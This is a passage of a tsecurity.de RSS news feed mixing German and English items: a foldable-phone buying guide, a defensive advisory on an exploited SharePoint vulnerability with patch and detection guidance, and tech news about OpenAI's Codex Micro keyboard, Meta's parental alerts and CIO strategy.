<p class="wp-block-paragraph">Foldables im Buchformat verfolgen einen anderen Ansatz. Sie sind geschlossen fast wie ein normales Smartphone nutzbar, öffnen sich aber zu einem deutlich größeren Display. Das lohnt sich vor allem für Multitasking, Office-Apps, E-Mails, Dokumente, Karten, Chats und Web-Recherche. Wer häufig zwei Apps parallel nutzt oder unterwegs produktiver arbeiten möchte, profitiert hier am meisten. Breitere Foldables sind dagegen stärker auf Unterhaltung ausgelegt: Videos, Spiele, Fotos und Webseiten wirken auf dem aufgeklappten Display natürlicher und weniger schmal.</p>



<p class="wp-block-paragraph">Noch spezieller sind Trifold-Modelle mit drei Display-Segmenten. Sie bieten besonders viel Bildschirmfläche, sind aber derzeit noch teuer, selten und eher eine Technikvorschau als eine Massenlösung. Für die meisten Käufer bleibt daher die Wahl zwischen Flip-Phone und Foldable im Buchformat. Wer ein möglichst kompaktes Gerät sucht, greift zum Flip. Wer ein Smartphone mit Tablet-Gefühl möchte, ist beim großen Fold besser aufgehoben. Unsere Kaufberatung zeigt, welche Modelle 2026 überzeugen – und welches Foldable zu welchem Nutzertyp passt.</p>



<h2 class="wp-block-heading">FAQ: Die wichtigsten Fragen zu Foldables</h2>



<h3 class="wp-block-heading">1. Was ist der Unterschied zwischen einem Fold und einem Flip Phone?</h3>



<p class="wp-block-paragraph">Ein Flip Phone lässt sich vertikal zusammenklappen und wird dadurch besonders kompakt. Es eignet sich vor allem für Nutzer, die ein handliches Smartphone suchen und trotzdem moderne Funktionen nutzen möchten. Ein Fold öffnet sich dagegen seitlich wie ein Buch und bietet innen ein deutlich größeres Display. Das ist vor allem für Multitasking, produktives Arbeiten, Lesen, Videos und Spiele interessant.</p>



<h3 class="wp-block-heading">2. Für wen lohnt sich ein Foldable?</h3>



<p class="wp-block-paragraph">Ein Foldable lohnt sich vor allem für Nutzer, die mehr Bildschirmfläche möchten, aber kein separates Tablet mitnehmen wollen. Flip-Phones sind sinnvoll, wenn das Smartphone möglichst klein in die Tasche passen soll. Große Foldables lohnen sich für alle, die häufig mehrere Apps parallel nutzen, unterwegs arbeiten, viel lesen oder Medien auf einem größeren Display genießen möchten.</p>



<h3 class="wp-block-heading">3. Sind Foldables heute robust genug für den Alltag?</h3>



<p class="wp-block-paragraph">Aktuelle Foldables sind deutlich stabiler als die ersten Generationen. Scharniere, Rahmen und Displays wurden verbessert, viele Modelle bieten zudem Schutz gegen Wasser oder Staub. Trotzdem bleiben faltbare Displays empfindlicher als starre Glasflächen. Eine gute Hülle, vorsichtiger Umgang mit Sand und Staub sowie ein Blick auf die Schutzklasse des jeweiligen Modells sind daher wichtig.</p>



<h3 class="wp-block-heading">4. Welche Nachteile haben faltbare Smartphones?</h3>



<p class="wp-block-paragraph">Foldables sind meist teurer als klassische Smartphones mit vergleichbarer Ausstattung. Dazu kommen ein höheres Gewicht, sichtbare Bildschirmfalten und je nach Modell Kompromisse bei Kamera, Akkulaufzeit oder Gehäusedicke. Auch Reparaturen können teurer ausfallen. Vor dem Kauf sollte deshalb klar sein, ob die größere Displayfläche den Aufpreis im Alltag wirklich rechtfertigt.</p>



<h3 class="wp-block-heading">5. Worauf sollte man beim Kauf eines Foldables achten?</h3>



<p class="wp-block-paragraph">Wichtig sind Bauform, Displaygröße, Außendisplay, Scharnierqualität, Akkulaufzeit, Kamera, Software-Anpassungen und Update-Versprechen. Bei großen Foldables zählt besonders, wie gut Multitasking und App-Anpassung funktionieren. Bei Flip-Phones ist das Außendisplay entscheidend: Je größer und vielseitiger es ist, desto häufiger lässt sich das Gerät nutzen, ohne es aufzuklappen.</p>



<h2 class="wp-block-heading">Wie wir testen</h2>



<p class="wp-block-paragraph">Wir bewerten faltbare Smartphones nicht nur nach Datenblatt, sondern vor allem im Alltag. Entscheidend sind Displayqualität, Scharniermechanik, Verarbeitung, Leistung, Akkulaufzeit, Kameraqualität und Software-Anpassungen für den großen Innenbildschirm.<br><br>(<a href="https://www.pcwelt.de/article/2109390/bestes-falt-smartphone.html" data-type="link" data-id="https://www.pcwelt.de/article/2109390/bestes-falt-smartphone.html" target="_blank">PC-Welt</a>)<br><br><br></p>



<p class="wp-block-paragraph"><br><br></p>



<p class="wp-block-paragraph"><br><br><br><br><br><br></p>



<p class="wp-block-paragraph"><br><br></p>



<p class="wp-block-paragraph"><br><br><br><br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v 7.0.2]]></title>
<description><![CDATA[Fix editing existing rich messages.
Fix editing scheduled rich messages.
Improve rich messages editor (drag-n-drop, changing tables).
Allow forwarding to chats hidden inside a community.]]></description>
<link>https://tsecurity.de/de/3677076/downloads/v-702/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677076/downloads/v-702/</guid>
<pubDate>Fri, 17 Jul 2026 23:31:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Fix editing existing rich messages.</li>
<li>Fix editing scheduled rich messages.</li>
<li>Improve rich messages editor (drag-n-drop, changing tables).</li>
<li>Allow forwarding to chats hidden inside a community.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-58644: Microsoft SharePoint Server Unauthenticated Remote Code Execution Vulnerability Exploited in the Wild]]></title>
<description><![CDATA[OverviewOn July 14, 2026, Microsoft published a security advisory addressing CVE-2026-58644, a critical remote code execution (RCE) vulnerability affecting on-premises Microsoft SharePoint Server deployments. The vulnerability, which carries a CVSS v3.1 score of 9.8 (Critical), results from the d...]]></description>
<link>https://tsecurity.de/de/3676852/it-security-nachrichten/cve-2026-58644-microsoft-sharepoint-server-unauthenticated-remote-code-execution-vulnerability-exploited-in-the-wild/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676852/it-security-nachrichten/cve-2026-58644-microsoft-sharepoint-server-unauthenticated-remote-code-execution-vulnerability-exploited-in-the-wild/</guid>
<pubDate>Fri, 17 Jul 2026 20:53:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><span>On July 14, 2026, Microsoft </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span>published</span></a><span> a security advisory addressing </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-58644"><span>CVE-2026-58644</span></a><span>, a critical remote code execution (RCE) vulnerability affecting on-premises Microsoft SharePoint Server deployments. The vulnerability, which carries a CVSS v3.1 score of 9.8 (Critical), results from the deserialization of untrusted data (</span><a href="https://cwe.mitre.org/data/definitions/502.html"><span>CWE-502</span></a><span>) and allows an unauthenticated attacker to execute arbitrary code.</span></p><p><span>Microsoft confirmed active exploitation of CVE-2026-58644, and the vulnerability was subsequently added to CISA’s Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span>KEV</span></a><span>) catalog on July 16, 2026. In parallel, CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/14/cisa-urges-sharepoint-hardening-after-new-exploitations"><span>published</span></a><span> guidance recommending organizations immediately apply Microsoft’s security updates and leverage Microsoft Defender and AMSI detections to identify exploitation attempts.</span></p><p><span>Affected products:</span></p><ul><li><p><span>Microsoft SharePoint Enterprise Server 2016</span></p></li><li><p><span>Microsoft SharePoint Server 2019</span></p></li><li><p><span>Microsoft SharePoint Server Subscription Edition</span></p></li></ul><h2>Mitigation guidance</h2><p><span>Organizations operating affected on-premises Microsoft SharePoint Server should prioritize remediation on an emergency basis.</span></p><p><span>Microsoft’s recommendations:</span></p><ul><li><p><span>Apply the July 14, 2026 security updates for all affected SharePoint versions.</span></p></li><li><p><span>Verify that security updates completed successfully across all SharePoint servers.</span></p></li><li><p><span>Ensure Antimalware Scan Interface (AMSI) integration is enabled for every SharePoint web application.</span></p></li><li><p><span>Monitor Microsoft Defender and AMSI detections for indicators of attempted exploitation.</span></p></li><li><p><span>Initiate incident response procedures if exploitation artifacts are detected.</span></p></li></ul><p><span>Microsoft and CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/14/cisa-urges-sharepoint-hardening-after-new-exploitations"><span>recommend</span></a><span> monitoring for the following security detections associated with observed SharePoint exploitation activity.</span></p><p><span>AMSI / Microsoft Defender detections:</span></p><ul><li><p><span>Exploit:Script/SuspSignoutReqBody.A</span></p></li></ul><ul><li><p><span>Request body scanning</span></p></li><li><p><span>SharePoint Server Subscription Edition</span></p></li><li><p><span>Microsoft reports observed exploitation attempts are blocked by this signature.</span></p></li></ul><ul><li><p><span>Exploit:Script/ToolPaneAuthBypass.A</span></p></li></ul><ul><li><p><span>Request header scanning</span></p></li><li><p><span>Applies to SharePoint Server 2016, SharePoint Server 2019, and Subscription Edition.</span></p></li></ul><ul><li><p><span>Exploit:Script/ToolPaneAuthBypass</span></p></li></ul><p><span>At the time of publication, no public IP addresses, domains, URLs, or additional network-based indicators of compromise have been widely disclosed.</span></p><p><span>Administrators should consult Microsoft’s </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span>advisory</span></a><span> for the most current remediation guidance and update availability.</span></p><h2>Rapid7 customers</h2><h3>Exposure Command, InsightVM, and Nexpose</h3><p><span>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-58644 with an authenticated vulnerability check available since the July 14 content release.</span></p><h2>Updates</h2><ul><li><span><strong>July 17, 2026</strong></span><span>: Initial publication.</span></li></ul><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp: Das passiert jetzt bei einigen Nutzern, wenn sie eine Nachricht versenden]]></title>
<description><![CDATA[Hast du eine Veränderung in deinen WhatsApp-Chats wahrgenommen? Dann geht es dir damit nicht alleine so. Was es damit auf sich hat und wie du diese Einstellung abstellen kannst, erfährst du hier.]]></description>
<link>https://tsecurity.de/de/3676716/it-nachrichten/whatsapp-das-passiert-jetzt-bei-einigen-nutzern-wenn-sie-eine-nachricht-versenden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676716/it-nachrichten/whatsapp-das-passiert-jetzt-bei-einigen-nutzern-wenn-sie-eine-nachricht-versenden/</guid>
<pubDate>Fri, 17 Jul 2026 19:32:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hast du eine Veränderung in deinen WhatsApp-Chats wahrgenommen? Dann geht es dir damit nicht alleine so. Was es damit auf sich hat und wie du diese Einstellung abstellen kannst, erfährst du hier.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI’s new hardware is a $230, 13-switch keyboard for Codex]]></title>
<description><![CDATA[OpenAI is selling its first hardware — without any help from Jony Ive. It describes the Codex Micro as a “command center for agentic work” but it’s really a 13-switch wireless keyboard customized to help developers keep tabs on what their Codex agents are doing. It costs $230.



The keyboard has...]]></description>
<link>https://tsecurity.de/de/3676651/ai-nachrichten/openais-new-hardware-is-a-230-13-switch-keyboard-for-codex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676651/ai-nachrichten/openais-new-hardware-is-a-230-13-switch-keyboard-for-codex/</guid>
<pubDate>Fri, 17 Jul 2026 19:19:49 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI is selling its first hardware — without any help from <a href="https://www.computerworld.com/article/3992592/jony-ive-and-openai-plan-bicycles-for-21st-century-minds.html">Jony Ive</a>. It describes the Codex Micro as a “<a href="https://openai.com/supply/co-lab/work-louder/">command center for agentic work</a>” but it’s really a 13-switch wireless keyboard customized to help developers keep tabs on what their Codex agents are doing. It costs $230.</p>



<p class="wp-block-paragraph">The keyboard has 13 mechanical switches (one keycap covers two of them by default), a rotary encoder, joystick, and RGB backlighting around the whole keypad and individual keys. It comes with 32 customizable icon keycaps.</p>



<p class="wp-block-paragraph">OpenAI claims that the Codex Micro is a serious business tool: The command keys enable Codex users accept changes, reject outputs, push-to-talk, start new chats, and trigger custom actions. The rotary encoder can be used to dial up the “brainpower” allocated to tasks — or in more conventional terms, how many tokens to allocate to reasoning on a task. And the RGB lighting can provide feedback on how various tasks are progressing. And the RGB lighting under the “agent” keys can provide feedback on how various tasks are progressing.</p>



<p class="wp-block-paragraph">The Codex Micro’s manufacturer, Work Louder, already has a similar device on the market, <a href="https://worklouder.cc/creator-micro-2">the Creator Micro</a>, which offers similar functionality, but without the colorful keys. It costs $56 less than the Codex Micro, however.</p>



<p class="wp-block-paragraph">The Codex Micro will fit in snugly with <a href="https://openai.com/supply/shop/">OpenAI’s other merchandise</a>, where using Codex is as much about a fashion statement as a technological choice.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI’s new hardware is a $230, 13-switch keyboard for Codex]]></title>
<description><![CDATA[OpenAI is selling its first hardware — without any help from Jony Ive. It describes the Codex Micro as a “command center for agentic work” but it’s really a 13-switch wireless keyboard customized to help developers keep tabs on what their Codex agents are doing. It costs $230.



The keyboard has...]]></description>
<link>https://tsecurity.de/de/3676628/it-nachrichten/openais-new-hardware-is-a-230-13-switch-keyboard-for-codex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676628/it-nachrichten/openais-new-hardware-is-a-230-13-switch-keyboard-for-codex/</guid>
<pubDate>Fri, 17 Jul 2026 19:18:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI is selling its first hardware — without any help from <a href="https://www.computerworld.com/article/3992592/jony-ive-and-openai-plan-bicycles-for-21st-century-minds.html">Jony Ive</a>. It describes the Codex Micro as a “<a href="https://openai.com/supply/co-lab/work-louder/">command center for agentic work</a>” but it’s really a 13-switch wireless keyboard customized to help developers keep tabs on what their Codex agents are doing. It costs $230.</p>



<p class="wp-block-paragraph">The keyboard has 13 mechanical switches (one keycap covers two of them by default), a rotary encoder, joystick, and RGB backlighting around the whole keypad and individual keys. It comes with 32 customizable icon keycaps.</p>



<p class="wp-block-paragraph">OpenAI claims that the Codex Micro is a serious business tool: The command keys enable Codex users accept changes, reject outputs, push-to-talk, start new chats, and trigger custom actions. The rotary encoder can be used to dial up the “brainpower” allocated to tasks — or in more conventional terms, how many tokens to allocate to reasoning on a task. And the RGB lighting can provide feedback on how various tasks are progressing. And the RGB lighting under the “agent” keys can provide feedback on how various tasks are progressing.</p>



<p class="wp-block-paragraph">The Codex Micro’s manufacturer, Work Louder, already has a similar device on the market, <a href="https://worklouder.cc/creator-micro-2">the Creator Micro</a>, which offers similar functionality, but without the colorful keys. It costs $56 less than the Codex Micro, however.</p>



<p class="wp-block-paragraph">The Codex Micro will fit in snugly with <a href="https://openai.com/supply/shop/">OpenAI’s other merchandise</a>, where using Codex is as much about a fashion statement as a technological choice.</p>



<p class="wp-block-paragraph"><em>This article first appeared on InfoWorld.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft stopft 622 Schwachstellen: Zero-Days in AD FS, SharePoint und BitLocker]]></title>
<description><![CDATA[Besonders kritisch sind drei Zero-Day-Lücken, die bereits aktiv ausgenutzt wurden: AD FS, SharePoint Server und BitLocker. Parallel bringt Windows ...]]></description>
<link>https://tsecurity.de/de/3676535/windows-server/microsoft-stopft-622-schwachstellen-zero-days-in-ad-fs-sharepoint-und-bitlocker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676535/windows-server/microsoft-stopft-622-schwachstellen-zero-days-in-ad-fs-sharepoint-und-bitlocker/</guid>
<pubDate>Fri, 17 Jul 2026 17:47:20 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Besonders kritisch sind drei Zero-Day-Lücken, die bereits aktiv ausgenutzt wurden: AD FS, SharePoint <b>Server</b> und BitLocker. Parallel bringt <b>Windows</b> ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Crystal Lake: Teaser zur Prequel-Serie von „Freitag der 13.“]]></title>
<description><![CDATA[Aktuell scheint die Zeit zu sein, in der die Horror-Ikonen der 1980er-Jahre neu auferstehen. Einerseits soll „A Nightmare in Elm Street“ ja ein Revival erleben. Parallel ist jetzt ein Teaser zur kommenden Prequel-Serie von „Freitag der 13.“ erschienen. Das Format...Zum Beitrag: Crystal Lake: Teas...]]></description>
<link>https://tsecurity.de/de/3676198/it-nachrichten/crystal-lake-teaser-zur-prequel-serie-von-freitag-der-13/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676198/it-nachrichten/crystal-lake-teaser-zur-prequel-serie-von-freitag-der-13/</guid>
<pubDate>Fri, 17 Jul 2026 15:33:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aktuell scheint die Zeit zu sein, in der die Horror-Ikonen der 1980er-Jahre neu auferstehen. Einerseits soll „A Nightmare in Elm Street“ ja ein Revival erleben. Parallel ist jetzt ein Teaser zur kommenden Prequel-Serie von „Freitag der 13.“ erschienen. Das Format...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/crystal-lake-teaser-zur-prequel-serie-von-freitag-der-13/">Crystal Lake: Teaser zur Prequel-Serie von „Freitag der 13.“</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta AI Updates Its Chatbot To Alert Parents About Teen Self-Harm]]></title>
<description><![CDATA[The social media giant Meta just added a major safety feature to its digital assistant. When younger users have conversations that involve thoughts of suicide or hurting themselves, the company will step in. Instead of just showing crisis hotlines on the screen, the system will now send a direct ...]]></description>
<link>https://tsecurity.de/de/3676171/ios-mac-os/meta-ai-updates-its-chatbot-to-alert-parents-about-teen-self-harm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676171/ios-mac-os/meta-ai-updates-its-chatbot-to-alert-parents-about-teen-self-harm/</guid>
<pubDate>Fri, 17 Jul 2026 15:26:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The social media giant Meta just added a major safety feature to its digital assistant. When younger users have conversations that involve thoughts of suicide or hurting themselves, the company will step in. Instead of just showing crisis hotlines on the screen, the system will now send a direct notification right to a linked parent or guardian. The change aims to help families address these serious issues in real life.



Human reviewers check the flagged chats before sending parental alerts



To make this work, the platform requires families to opt into its specific supervision tools first. Once those settings are active, the artificial intelligence monitors the background chats for any signs of distress. However, a computer program does not make the final call on its own.



The company stated that a real person will manually review every conversation flagged by the AI. This extra step helps prevent false alarms from reaching parents over harmless chats. If a reviewer decides the context is unclear, the system will still notify the parent just to be safe.



The safety rollout is currently live for users in the United States, Canada, the United Kingdom, and Australia. The company plans to expand this coverage to more countries later this year. Looking forward, the platform is also building a tool to contact emergency services directly if a chat suggests an immediate risk to a user's life.



Ultimately, this update gives families a practical tool to handle difficult situations. While no monitoring program is flawless, relying on human reviewers shows a careful approach to keeping vulnerable users safe online.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why technology leaders are losing the AI conversation to the people who report to them]]></title>
<description><![CDATA[I keep seeing a version of the same scene. A CEO has a question about AI. It is a real question, the kind that will shape where the company spends the next two years. The CEO does not bring it to the CIO. They bring it to a data leader two levels down, or to a vendor who presented at a conference...]]></description>
<link>https://tsecurity.de/de/3675833/it-nachrichten/why-technology-leaders-are-losing-the-ai-conversation-to-the-people-who-report-to-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675833/it-nachrichten/why-technology-leaders-are-losing-the-ai-conversation-to-the-people-who-report-to-them/</guid>
<pubDate>Fri, 17 Jul 2026 13:03:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I keep seeing a version of the same scene. A CEO has a question about AI. It is a real question, the kind that will shape where the company spends the next two years. The CEO does not bring it to the CIO. They bring it to a data leader two levels down, or to a vendor who presented at a conference, or to an AI specialist a board member recommended. The CIO finds out the strategy is forming when a slide shows up that they did not build. By then, the direction is already half-set, and the CIO is being asked to react to it rather than shape it.</p>



<p class="wp-block-paragraph">I want to be precise about what is happening, because it is easy to misread. The CIO has not been removed from anything. Title intact, budget intact, seat at the table intact. What has changed is quieter. On one of the most consequential technology conversations the company will have this decade, the CIO is being routed around. The work still flows through them eventually. The thinking no longer starts with them.</p>



<p class="wp-block-paragraph">I have watched this happen to capable people who would have given the CEO a better answer than the person who was asked. That is what makes it worth naming. This is not a competence gap. It is a positioning gap, and positioning gaps close in the wrong direction if you ignore them long enough.</p>



<h2 class="wp-block-heading">How the routing actually starts</h2>



<p class="wp-block-paragraph">The routing does not begin with a decision to exclude anyone. It begins with a CEO who is anxious about AI and looking for someone who sounds certain. AI is moving fast enough that executives feel the pressure to have a point of view before they have earned one. That pressure usually arrives secondhand, from a board member or a peer on the golf course describing what is working at their company. So the CEO goes looking for someone who will confirm the answer they already want to hear, and they keep going back to whoever gives it to them.</p>



<p class="wp-block-paragraph">Here is where many technology leaders lose the thread. For years, the safe posture in the CIO seat was measured caution. You raised the risks, you flagged the integration cost, you asked who owns the data and what the compliance exposure looks like. That posture built credibility in an era when the failure mode was moving too fast on technology nobody understood. With AI, the same posture reads as drag. A CEO who is being told by three vendors that “the future is already here” does not want to hear why they should slow down and be cautious. They hear caution as losing the race, and they go find a point of view somewhere else.</p>



<p class="wp-block-paragraph">The data leaders, vendors and specialists who get the call are not necessarily more capable. They are more available with a confident answer. A vendor’s whole job is to arrive with conviction. A data scientist who has shipped one impressive model carries more apparent authority on AI, in that moment, than a CIO who runs the entire estate but talks about AI the way they talk about every other risk. The CEO is not weighing depth against depth. They are weighing the person who said yes against the person who said it depends.</p>



<p class="wp-block-paragraph">Once that pattern sets, it compounds. The CEO who got a satisfying answer from the data leader goes back to the data leader. The vendor who shaped the first conversation gets invited into the second. Each loop the CIO is not in makes the next one easier to run without them. The org chart still says the CIO owns technology strategy. The actual conversation has relocated.</p>



<h2 class="wp-block-heading">What it costs before anyone notices</h2>



<p class="wp-block-paragraph">The cost shows up late, which is exactly why it is dangerous. For a while nothing looks broken. The CIO is still delivering. The AI initiatives are still landing on their plate to execute. The damage is happening upstream, in the room where the bets get made, and the CIO is not in that room.</p>



<p class="wp-block-paragraph">I have seen what arrives downstream when the strategy was set without the person who has to run it. A model gets championed that the data cannot actually support. A vendor commitment gets made that locks the company into an architecture the CIO would have flagged in the first meeting. An agent gets deployed inside a business unit, with executive blessing, and the CIO inherits accountability for it months later without ever having shaped how it was governed. The recent IBM finding that <a href="https://www.cio.com/article/4182288/cios-are-being-held-accountable-for-ai-they-dont-fully-control-ibm-study-finds.html">CIOs are increasingly held accountable for AI they do not fully control</a> is the visible end of this. The invisible front end is the conversation the CIO was routed around, the one where the accountability got created in the first place.</p>



<p class="wp-block-paragraph">What I find most corrosive is what it does to the CIO’s standing over time. Every initiative the CIO executes but did not shape reinforces a story about what the CIO is for. They become the person who runs the technology other people decided on. That is a fine description of an order taker and a poor description of a strategic leader, and CEOs do not promote, fund, or defend order takers when budgets tighten. The routing-around does not just cost the company a worse AI strategy. It quietly recasts the CIO as the implementer of everyone else’s thinking, and that recasting is hard to reverse once the executive team has internalized it.</p>



<h2 class="wp-block-heading">What the leaders who stayed in the conversation did</h2>



<p class="wp-block-paragraph">The technology leaders I have watched hold their position on AI did one thing first. They stopped leading with caution and started leading with a point of view. Not a reckless one. A real, defensible position on where AI creates value in their specific business and where it does not, delivered with the same conviction the vendors bring, before the CEO went looking elsewhere for it. They made themselves the person with the clearest answer, which is the role the routing-around was filling with someone else.</p>



<p class="wp-block-paragraph">That requires giving up a posture that felt safe for a long time. The CIOs who made the shift accepted that on AI, being right and cautious is worth less than being early and directional. They formed a view ahead of being asked. They walked into the CEO’s office with where we should place our AI bets and why, rather than waiting to be handed someone else’s bets to pressure-test. The difference is whether you are the author of the strategy or its editor, and CEOs route around editors.</p>



<p class="wp-block-paragraph">They also changed how they talk about risk. Instead of presenting risk as the reason to slow down, they folded it into the recommendation. The data is not ready for that use case, so here is the use case where it is ready, and here is what we do in parallel to unlock the first one. That framing keeps the CIO inside the conversation as the person making AI happen responsibly, rather than the person standing outside it explaining why it is hard. Same expertise, opposite effect on whether the CEO keeps coming back.</p>



<p class="wp-block-paragraph">None of this is about pushing the data leaders and specialists out. The strongest CIOs I know pulled those people closer and brought them into the room under their own framing, so that when the CEO wanted the specialist’s input, it arrived through the CIO rather than around them. They made themselves the orchestrator of the AI conversation instead of one of its casualties.</p>



<p class="wp-block-paragraph">If you are a technology leader right now, the question worth sitting with is not whether you are good at AI. You probably are. The question is whether the most important AI conversations in your company are still starting with you, or whether you have quietly become the person they get handed to after the thinking is done. That answer is set in rooms you may not be in, and the only way to find out is to ask who your CEO called the last three times AI came up. If the answer is not you, the role is still yours. The conversation has already started leaving.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Is Selling $230 Codex Micro Hardware Product With Work Louder]]></title>
<description><![CDATA[OpenAI recently teamed up with Work Louder to release a physical tool for developers. Reports show OpenAI is selling $230 Codex Micro hardware product units on its website now. The keyboard brings your digital agent workspace straight to your desk. It helps users manage active chats and keep trac...]]></description>
<link>https://tsecurity.de/de/3675822/ios-mac-os/openai-is-selling-230-codex-micro-hardware-product-with-work-louder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675822/ios-mac-os/openai-is-selling-230-codex-micro-hardware-product-with-work-louder/</guid>
<pubDate>Fri, 17 Jul 2026 12:53:59 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI recently teamed up with Work Louder to release a physical tool for developers. Reports show OpenAI is selling $230 Codex Micro hardware product units on its website now. The keyboard brings your digital agent workspace straight to your desk. It helps users manage active chats and keep track of tasks through live lighting feedback. Buyers can pick between a clicky or silent switch version when ordering the device.



The device offers physical controls for common coding workflow tasks



The gadget maps your most used actions to physical buttons. This release shows its push into the physical world of artificial intelligence tools.



It connects directly with the desktop app to provide high customization. You can reassign any key or change how the agent buttons work to fit your specific needs. Each key lights up with a status indicator so you can see if the program is thinking, running, waiting, or done before you even open a chat window.



Here is a look at the specific features built into this product:




Trigger skills instantly: Users can flick the built-in joystick to launch common workflows. This includes reviewing a pull request, debugging a coding error, or refactoring text.



Keep core actions close: The command keys give you a dedicated shortcut for accepting, rejecting, or starting a new chat.



Set the brainpower: You can turn a physical dial to adjust the reasoning level of the AI on the fly. This lets you stay fast for simple tasks or turn it up for heavier thinking.




This hardware release marks a big shift in how developers interact with digital models. Moving software controls to a physical keypad saves time by reducing screen switching. It also makes working with smart agents feel much more natural and direct.



The release points to a future where physical devices bridge the gap between human input and complex background processing.]]></content:encoded>
</item>
<item>
<title><![CDATA[Der digitale Ernstfall hat keinen Schützengraben]]></title>
<description><![CDATA[Author: Security-Insider - Bewertung: 0x - Views:0 Ben Wetter von der Bundeswehr erklärt in Folge 117 des Security-Insider Podcast, was hinter der NATO-Übung „Locked Shields“ steckt.

Es ist eine der weltweit größten Live-Fire-Übungen im Cyberbereich. Mehr als 40 Nationen trainieren mit Tausenden...]]></description>
<link>https://tsecurity.de/de/3675684/it-security-video/der-digitale-ernstfall-hat-keinen-schuetzengraben/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675684/it-security-video/der-digitale-ernstfall-hat-keinen-schuetzengraben/</guid>
<pubDate>Fri, 17 Jul 2026 12:03:28 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security-Insider - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/axVNoXBoqIg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Ben Wetter von der Bundeswehr erklärt in Folge 117 des Security-Insider Podcast, was hinter der NATO-Übung „Locked Shields“ steckt.<br />
<br />
